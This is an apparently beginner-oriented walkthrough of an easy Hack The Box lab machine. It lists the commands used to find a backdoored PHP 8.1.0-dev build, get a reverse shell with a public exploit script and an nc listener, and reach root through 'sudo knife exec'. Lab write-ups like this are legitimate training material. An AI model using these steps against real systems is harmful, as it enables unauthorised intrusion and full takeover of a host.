data:image/s3,"s3://crabby-images/5956d/5956d9d0a296d3f345b9d7c83424631c50454556" alt=""
It’s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly.
We will start from port scanning with nmap:
nmap -A 10.10.10.242 -Pn
(We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the host.)
data:image/s3,"s3://crabby-images/35e6a/35e6afb1d7f37cb763e266b90c0a029c011a9734" alt=""
Only two ports seem to be open. Let’s check the web site which is running on 80 port!
data:image/s3,"s3://crabby-images/92403/9240385a5c8afff745b4ae0de9507ceecbb5cb8a" alt=""
But i wasn’t able to find something interesting here, nothing in page source and no interesting links as well. Also directory enumeration with gobuster had no result π So you can skip this step.
Now time to check the site with curl:
curl -I 10.10.10.242
(we use -I option to print the title without the body)
data:image/s3,"s3://crabby-images/59ebc/59ebc3c57caeff6dcb51f2e684739fe0d28fe527" alt=""
And what we see! Very strange version of php here…Let’s google that.
We can find out that it is a version of php with a backdoor and use an exploit. I took the following one from github:
data:image/s3,"s3://crabby-images/2ebd6/2ebd6195acc0f86566927ee39b77d73e2165548c" alt=""
https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
So we need to grab a code from this link and put it to the file that we create (I called it shell.py):
nano shell.py
(I prefer nano, but you can use vi or vim, etc.)
data:image/s3,"s3://crabby-images/cefc3/cefc39e269eb2bb5f4ef6f26dc83697ac93848f7" alt=""
Then set our listener on 443 port (or you can use different one):
nc -lnvp 443
data:image/s3,"s3://crabby-images/353a9/353a95499bd73e8041c5d64f80c0196c6063a825" alt=""
And run our script. Usage: python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
python3 shell.py http://10.10.10.242 10.10.14.16 443
data:image/s3,"s3://crabby-images/00f25/00f25363369c47b21bcf049d5cb1b0dfff065199" alt=""
And… we got a shell π
data:image/s3,"s3://crabby-images/3bde7/3bde736288c88ebeea68e483064ded12e1c3213d" alt=""
Flag is waiting for us in user’s home directory:
cat /home/james/user.txt
data:image/s3,"s3://crabby-images/41ee9/41ee9c642724ca621e22954352d1b8bbff7d6af4" alt=""
Next we need to find a way how to get root. Try to check which programs our user james can run with root privileges:
sudo -l
data:image/s3,"s3://crabby-images/49bba/49bba102edc23944e72b4975a48a165283385eb1" alt=""
And he can run knife! Now moving to the GTFOBins and checking for Knife. And it’s exists here:
https://gtfobins.github.io/gtfobins/knife/
data:image/s3,"s3://crabby-images/dbf27/dbf274cf26a2ca24295c3c9e412b767e5ab0b38f" alt=""
Let’s copy the command and run it:
sudo knife exec -E ‘exec “/bin/sh”‘
data:image/s3,"s3://crabby-images/8b2c5/8b2c50211f6a49faf0f5e0455991f69ae3245f48" alt=""
Very nice, we have root π
Flag in root directory:
cat /root/root.txt
data:image/s3,"s3://crabby-images/7415f/7415f008ad6c0b47503fca3c8425c944f80ffbb9" alt=""
Thanks for your attention. If you still have any questions write a comment below.